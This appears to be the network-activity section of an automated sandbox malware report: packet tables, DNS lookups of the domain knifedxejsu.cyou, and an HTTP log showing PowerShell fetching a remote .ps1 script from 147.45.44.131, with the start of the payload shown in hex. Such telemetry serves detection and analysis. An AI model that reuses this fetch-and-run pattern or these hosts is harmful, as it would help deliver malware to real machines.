Nov 7, 2024 17:55:21.000900030 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:21.000931978 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:21.001065969 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:21.001079082 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:21.001312971 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:21.003951073 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:21.006563902 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:21.006596088 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:21.006795883 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:21.006808043 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:21.007042885 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:21.009372950 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:21.012295008 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:21.012320042 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:21.012586117 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:21.012598991 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:21.012761116 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:21.015203953 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:21.017769098 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:21.017870903 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:21.017975092 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:21.017987967 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:21.018260002 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:21.020811081 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:21.023444891 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:21.023464918 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:21.023715019 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:21.023725033 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:21.023876905 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:21.026118040 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:21.026165009 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:21.026310921 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:21.026504993 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:21.026530981 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:21.261518002 CET	49720	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:21.261544943 CET	443	49720	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:21.261717081 CET	49720	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:21.261934996 CET	49720	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:21.261948109 CET	443	49720	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:21.478652954 CET	443	49720	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:21.478914022 CET	49720	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:21.479810953 CET	49720	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:21.479820967 CET	443	49720	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:21.480201960 CET	443	49720	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:21.481256008 CET	49720	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:21.481431007 CET	49720	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:21.481441975 CET	443	49720	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:22.274285078 CET	443	49720	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:22.274390936 CET	443	49720	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:22.274727106 CET	49720	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:22.274727106 CET	49720	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:22.323936939 CET	49719	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:22.337785006 CET	49724	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:22.337812901 CET	443	49724	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:22.338149071 CET	49724	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:22.338819027 CET	49724	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:22.338829041 CET	443	49724	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:22.552829981 CET	443	49724	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:22.553138018 CET	49724	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:22.554013014 CET	49724	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:22.554023027 CET	443	49724	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:22.554357052 CET	443	49724	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:22.555464983 CET	49724	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:22.555609941 CET	49724	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:22.555660963 CET	49724	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:22.555671930 CET	443	49724	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:22.555685043 CET	443	49724	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:22.555710077 CET	49724	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:22.555754900 CET	443	49724	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:22.555901051 CET	49724	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:22.555943012 CET	443	49724	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:22.578532934 CET	49720	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:22.578545094 CET	443	49720	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:23.063602924 CET	443	49724	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:23.063719988 CET	443	49724	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:23.063863993 CET	49724	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:23.063992023 CET	49724	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:23.064008951 CET	443	49724	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:23.084112883 CET	49725	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:23.084139109 CET	443	49725	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:23.084359884 CET	49725	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:23.084604025 CET	49725	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:23.084614992 CET	443	49725	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:23.285692930 CET	49726	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:23.285713911 CET	443	49726	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:23.285923004 CET	49726	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:23.286771059 CET	49726	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:23.286782980 CET	443	49726	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:23.297574997 CET	443	49725	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:23.297760010 CET	49725	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:23.299412966 CET	49725	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:23.299420118 CET	443	49725	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:23.299710035 CET	443	49725	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:23.300848007 CET	49725	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:23.301042080 CET	49725	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:23.301105022 CET	443	49725	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:23.301232100 CET	49725	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:23.301239967 CET	443	49725	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:23.702147007 CET	443	49726	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:23.702574968 CET	49726	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:23.702593088 CET	443	49726	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:23.704427004 CET	443	49726	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:23.704605103 CET	49726	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:23.705866098 CET	49726	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:23.706043959 CET	443	49726	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:23.760483980 CET	49726	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:23.760497093 CET	443	49726	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:23.807399035 CET	49726	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:24.112797022 CET	443	49725	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:24.112991095 CET	443	49725	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:24.113137960 CET	49725	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:24.113138914 CET	49725	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:24.164298058 CET	49727	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:24.164320946 CET	443	49727	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:24.164479971 CET	49727	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:24.164685011 CET	49727	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:24.164699078 CET	443	49727	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:24.379256964 CET	443	49727	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:24.379486084 CET	49727	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:24.380567074 CET	49727	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:24.380589008 CET	443	49727	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:24.381006002 CET	443	49727	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:24.382220030 CET	49727	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:24.382353067 CET	49727	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:24.382371902 CET	443	49727	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:24.382397890 CET	49727	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:24.382419109 CET	443	49727	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:24.382478952 CET	49727	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:24.382529020 CET	443	49727	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:24.382672071 CET	49727	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:24.382724047 CET	443	49727	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:25.290704966 CET	443	49727	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:25.290993929 CET	443	49727	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:25.291066885 CET	49727	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:25.291193008 CET	49727	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:25.359100103 CET	49728	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:25.359164000 CET	443	49728	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:25.359339952 CET	49728	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:25.359621048 CET	49728	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:25.359659910 CET	443	49728	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:25.580908060 CET	443	49728	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:25.581150055 CET	49728	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:25.582042933 CET	49728	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:25.582067966 CET	443	49728	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:25.582725048 CET	443	49728	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:25.584547043 CET	49728	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:25.584698915 CET	49728	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:25.584718943 CET	443	49728	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:26.140902042 CET	443	49728	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:26.140981913 CET	443	49728	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:26.141170025 CET	49728	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:26.141287088 CET	49728	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:26.141300917 CET	443	49728	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:26.255450010 CET	49729	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:26.255486012 CET	443	49729	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:26.255698919 CET	49729	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:26.255927086 CET	49729	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:26.255944014 CET	443	49729	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:26.470129967 CET	443	49729	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:26.470376015 CET	49729	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:26.471199989 CET	49729	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:26.471223116 CET	443	49729	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:26.471663952 CET	443	49729	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:26.472795010 CET	49729	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:26.472886086 CET	49729	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:26.472908020 CET	443	49729	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:27.930053949 CET	443	49729	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:27.930265903 CET	443	49729	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:27.930421114 CET	49729	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:27.930557013 CET	49729	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:27.932805061 CET	49730	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:27.932867050 CET	443	49730	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:27.933094978 CET	49730	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:27.933289051 CET	49730	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:27.933327913 CET	443	49730	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:28.150727034 CET	443	49730	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:28.150953054 CET	49730	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:28.151820898 CET	49730	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:28.151859999 CET	443	49730	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:28.152548075 CET	443	49730	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:28.153533936 CET	49730	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:28.153533936 CET	49730	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:28.153728008 CET	443	49730	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:28.686719894 CET	443	49730	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:28.686970949 CET	443	49730	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:28.687128067 CET	49730	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:28.687182903 CET	49730	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:28.687215090 CET	443	49730	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:28.687237978 CET	49730	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:28.687257051 CET	443	49730	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:33.713747025 CET	443	49726	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:33.713848114 CET	443	49726	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:33.714000940 CET	49726	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:41.520311117 CET	49726	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:41.520354033 CET	443	49726	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:42.515894890 CET	49740	80	192.168.11.20	142.251.32.99
Nov 7, 2024 17:55:42.618458033 CET	80	49740	142.251.32.99	192.168.11.20
Nov 7, 2024 17:55:42.619442940 CET	49740	80	192.168.11.20	142.251.32.99
Nov 7, 2024 17:55:42.619442940 CET	49740	80	192.168.11.20	142.251.32.99
Nov 7, 2024 17:55:42.722201109 CET	80	49740	142.251.32.99	192.168.11.20
Nov 7, 2024 17:55:42.722769976 CET	80	49740	142.251.32.99	192.168.11.20
Nov 7, 2024 17:55:42.775127888 CET	49740	80	192.168.11.20	142.251.32.99
Nov 7, 2024 17:55:43.621510983 CET	49693	80	192.168.11.20	192.229.211.108
Nov 7, 2024 17:55:43.621681929 CET	49692	443	192.168.11.20	13.89.178.26
Nov 7, 2024 17:55:43.729182005 CET	80	49693	192.229.211.108	192.168.11.20
Nov 7, 2024 17:55:43.729834080 CET	49693	80	192.168.11.20	192.229.211.108
Nov 7, 2024 17:55:43.810539007 CET	443	49692	13.89.178.26	192.168.11.20
Nov 7, 2024 17:55:43.811429977 CET	49692	443	192.168.11.20	13.89.178.26
Nov 7, 2024 17:55:48.664190054 CET	49689	80	192.168.11.20	192.229.211.108
Nov 7, 2024 17:55:48.772887945 CET	80	49689	192.229.211.108	192.168.11.20
Nov 7, 2024 17:55:48.773086071 CET	49689	80	192.168.11.20	192.229.211.108
Nov 7, 2024 17:55:48.849935055 CET	49688	80	192.168.11.20	192.229.211.108
Nov 7, 2024 17:55:48.897111893 CET	49694	443	192.168.11.20	52.159.126.152
Nov 7, 2024 17:55:48.957408905 CET	80	49688	192.229.211.108	192.168.11.20
Nov 7, 2024 17:55:48.957556009 CET	49688	80	192.168.11.20	192.229.211.108
Nov 7, 2024 17:55:49.020756006 CET	443	49694	52.159.126.152	192.168.11.20
Nov 7, 2024 17:55:49.068840981 CET	49694	443	192.168.11.20	52.159.126.152
Nov 7, 2024 17:55:49.088330030 CET	49703	443	192.168.11.20	23.44.201.16
Nov 7, 2024 17:55:52.966718912 CET	49691	443	192.168.11.20	40.126.24.81
Nov 7, 2024 17:55:52.966752052 CET	49695	443	192.168.11.20	40.126.24.81
Nov 7, 2024 17:55:53.096609116 CET	443	49691	40.126.24.81	192.168.11.20
Nov 7, 2024 17:55:53.096618891 CET	443	49695	40.126.24.81	192.168.11.20
Nov 7, 2024 17:55:53.096813917 CET	49691	443	192.168.11.20	40.126.24.81
Nov 7, 2024 17:55:53.096813917 CET	49695	443	192.168.11.20	40.126.24.81
Nov 7, 2024 17:56:01.706996918 CET	443	49673	23.43.85.34	192.168.11.20
Nov 7, 2024 17:56:01.707015991 CET	443	49673	23.43.85.34	192.168.11.20
Nov 7, 2024 17:56:01.707242012 CET	49673	443	192.168.11.20	23.43.85.34
Nov 7, 2024 17:56:03.082391024 CET	443	49681	23.44.201.41	192.168.11.20
Nov 7, 2024 17:56:03.082406998 CET	443	49681	23.44.201.41	192.168.11.20
Nov 7, 2024 17:56:03.082698107 CET	49681	443	192.168.11.20	23.44.201.41
Nov 7, 2024 17:56:03.087337971 CET	443	49672	204.79.197.203	192.168.11.20
Nov 7, 2024 17:56:23.230072975 CET	49750	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:56:23.230096102 CET	443	49750	142.251.35.164	192.168.11.20
Nov 7, 2024 17:56:23.230257034 CET	49750	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:56:23.230633974 CET	49750	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:56:23.230681896 CET	443	49750	142.251.35.164	192.168.11.20
Nov 7, 2024 17:56:23.648813009 CET	443	49750	142.251.35.164	192.168.11.20
Nov 7, 2024 17:56:23.649251938 CET	49750	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:56:23.649291992 CET	443	49750	142.251.35.164	192.168.11.20
Nov 7, 2024 17:56:23.650369883 CET	443	49750	142.251.35.164	192.168.11.20
Nov 7, 2024 17:56:23.650871992 CET	49750	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:56:23.651150942 CET	443	49750	142.251.35.164	192.168.11.20
Nov 7, 2024 17:56:23.700683117 CET	49750	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:56:33.650176048 CET	443	49750	142.251.35.164	192.168.11.20
Nov 7, 2024 17:56:33.650283098 CET	443	49750	142.251.35.164	192.168.11.20
Nov 7, 2024 17:56:33.650434971 CET	49750	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:56:43.469913960 CET	49740	80	192.168.11.20	142.251.32.99
Nov 7, 2024 17:56:43.573015928 CET	80	49740	142.251.32.99	192.168.11.20
Nov 7, 2024 17:56:43.573199034 CET	49740	80	192.168.11.20	142.251.32.99
Nov 7, 2024 17:56:45.842900038 CET	49750	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:56:45.842945099 CET	443	49750	142.251.35.164	192.168.11.20
Nov 7, 2024 17:56:48.887051105 CET	49694	443	192.168.11.20	52.159.126.152
Nov 7, 2024 17:56:48.887216091 CET	49709	443	192.168.11.20	52.159.127.243
Nov 7, 2024 17:56:49.011298895 CET	443	49694	52.159.126.152	192.168.11.20
Nov 7, 2024 17:56:49.011332989 CET	443	49709	52.159.127.243	192.168.11.20
Nov 7, 2024 17:56:49.060252905 CET	49694	443	192.168.11.20	52.159.126.152
Nov 7, 2024 17:56:49.060317993 CET	49709	443	192.168.11.20	52.159.127.243
Nov 7, 2024 17:56:56.046123981 CET	443	49684	40.126.24.81	192.168.11.20
Nov 7, 2024 17:56:57.928348064 CET	80	49680	192.229.211.108	192.168.11.20
Nov 7, 2024 17:56:57.928605080 CET	49680	80	192.168.11.20	192.229.211.108
Nov 7, 2024 17:56:58.236305952 CET	80	49679	192.229.211.108	192.168.11.20
Nov 7, 2024 17:56:58.236598015 CET	49679	80	192.168.11.20	192.229.211.108
Nov 7, 2024 17:57:07.530579090 CET	443	49696	4.153.57.10	192.168.11.20
Nov 7, 2024 17:57:07.530617952 CET	443	49696	4.153.57.10	192.168.11.20
Nov 7, 2024 17:57:07.530771017 CET	49696	443	192.168.11.20	4.153.57.10
Nov 7, 2024 17:57:07.530849934 CET	49696	443	192.168.11.20	4.153.57.10
Nov 7, 2024 17:57:07.644536972 CET	443	49696	4.153.57.10	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 7, 2024 17:55:02.627357006 CET	137	137	192.168.11.20	192.168.11.255
Nov 7, 2024 17:55:03.378921986 CET	137	137	192.168.11.20	192.168.11.255
Nov 7, 2024 17:55:04.144280910 CET	137	137	192.168.11.20	192.168.11.255
Nov 7, 2024 17:55:13.869865894 CET	51454	53	192.168.11.20	1.1.1.1
Nov 7, 2024 17:55:13.996067047 CET	53	51454	1.1.1.1	192.168.11.20
Nov 7, 2024 17:55:19.360069036 CET	57324	1900	192.168.11.20	239.255.255.250
Nov 7, 2024 17:55:19.370208025 CET	53	61663	1.1.1.1	192.168.11.20
Nov 7, 2024 17:55:19.443064928 CET	53	57323	1.1.1.1	192.168.11.20
Nov 7, 2024 17:55:19.524534941 CET	58035	53	192.168.11.20	1.1.1.1
Nov 7, 2024 17:55:19.524666071 CET	49464	53	192.168.11.20	1.1.1.1
Nov 7, 2024 17:55:19.627243996 CET	53	49464	1.1.1.1	192.168.11.20
Nov 7, 2024 17:55:19.627502918 CET	53	58035	1.1.1.1	192.168.11.20
Nov 7, 2024 17:55:20.201211929 CET	53	52835	1.1.1.1	192.168.11.20
Nov 7, 2024 17:55:20.364944935 CET	57324	1900	192.168.11.20	239.255.255.250
Nov 7, 2024 17:55:21.372302055 CET	57324	1900	192.168.11.20	239.255.255.250
Nov 7, 2024 17:55:22.481601000 CET	57324	1900	192.168.11.20	239.255.255.250
Nov 7, 2024 17:55:23.181535006 CET	58045	53	192.168.11.20	1.1.1.1
Nov 7, 2024 17:55:23.181617022 CET	63017	53	192.168.11.20	1.1.1.1
Nov 7, 2024 17:55:23.284454107 CET	53	58045	1.1.1.1	192.168.11.20
Nov 7, 2024 17:55:23.284806967 CET	53	63017	1.1.1.1	192.168.11.20
Nov 7, 2024 17:55:24.899877071 CET	53	65220	1.1.1.1	192.168.11.20
Nov 7, 2024 17:55:28.273586035 CET	53	61337	1.1.1.1	192.168.11.20
Nov 7, 2024 17:55:46.773217916 CET	53	50739	1.1.1.1	192.168.11.20
Nov 7, 2024 17:55:48.282248020 CET	53	56110	1.1.1.1	192.168.11.20
Nov 7, 2024 17:56:12.517052889 CET	53	64031	1.1.1.1	192.168.11.20
Nov 7, 2024 17:56:19.397077084 CET	53	50056	1.1.1.1	192.168.11.20
Nov 7, 2024 17:56:45.947165012 CET	53	61943	1.1.1.1	192.168.11.20
Nov 7, 2024 17:56:51.672255993 CET	138	138	192.168.11.20	192.168.11.255

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 7, 2024 17:55:13.869865894 CET	192.168.11.20	1.1.1.1	0x46a3	Standard query (0)	knifedxejsu.cyou	A (IP address)	IN (0x0001)	false
Nov 7, 2024 17:55:19.524534941 CET	192.168.11.20	1.1.1.1	0x827e	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 7, 2024 17:55:19.524666071 CET	192.168.11.20	1.1.1.1	0xa4bb	Standard query (0)	www.google.com	65	IN (0x0001)	false
Nov 7, 2024 17:55:23.181535006 CET	192.168.11.20	1.1.1.1	0x49cb	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 7, 2024 17:55:23.181617022 CET	192.168.11.20	1.1.1.1	0xcf87	Standard query (0)	www.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 7, 2024 17:55:13.996067047 CET	1.1.1.1	192.168.11.20	0x46a3	No error (0)	knifedxejsu.cyou	104.21.19.177	A (IP address)	IN (0x0001)	false
Nov 7, 2024 17:55:13.996067047 CET	1.1.1.1	192.168.11.20	0x46a3	No error (0)	knifedxejsu.cyou	172.67.187.9	A (IP address)	IN (0x0001)	false
Nov 7, 2024 17:55:19.627243996 CET	1.1.1.1	192.168.11.20	0xa4bb	No error (0)	www.google.com		65	IN (0x0001)	false
Nov 7, 2024 17:55:19.627502918 CET	1.1.1.1	192.168.11.20	0x827e	No error (0)	www.google.com	142.251.35.164	A (IP address)	IN (0x0001)	false
Nov 7, 2024 17:55:23.284454107 CET	1.1.1.1	192.168.11.20	0x49cb	No error (0)	www.google.com	142.251.35.164	A (IP address)	IN (0x0001)	false
Nov 7, 2024 17:55:23.284806967 CET	1.1.1.1	192.168.11.20	0xcf87	No error (0)	www.google.com		65	IN (0x0001)	false

HTTP Request Dependency Graph

knifedxejsu.cyou

www.google.com

147.45.44.131

c.pki.goog

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49710	147.45.44.131	80	9176	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 17:55:10.517822027 CET	278	OUT	GET /infopage/bhdh552.ps1 HTTP/1.1 X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: 147.45.44.131 Connection: Keep-Alive
Nov 7, 2024 17:55:10.704555988 CET	1289	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 16:55:10 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Wed, 06 Nov 2024 18:18:11 GMT ETag: "bde4-626428a5a6c47" Accept-Ranges: bytes Content-Length: 48612 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Data Raw: 0d 0a 24 44 54 6c 70 72 6d 69 62 54 52 51 51 31 30 76 62 6f 76 52 44 6b 35 56 44 4d 45 6d 74 4f 4a 48 61 45 42 47 6d 54 78 50 78 55 68 31 52 49 78 4f 57 6b 55 6b 50 6c 64 6c 37 77 69 63 6d 7a 6f 56 4b 4b 66 4d 5a 54 4a 53 72 66 54 6a 43 45 46 75 50 71 30 4a 75 5a 72 6f 31 51 39 70 62 55 32 78 35 55 51 47 32 6c 6f 42 61 43 73 39 31 74 69 32 72 6e 58 76 38 66 32 6c 53 71 6b 4a 6b 55 67 36 4e 56 4f 69 6e 79 32 33 43 5a 38 72 36 53 56 37 37 47 79 6f 77 36 5a 71 72 35 6f 62 42 66 52 51 57 57 56 46 66 41 65 73 57 75 74 4a 47 62 4f 41 34 4d 62 64 56 73 61 67 77 59 71 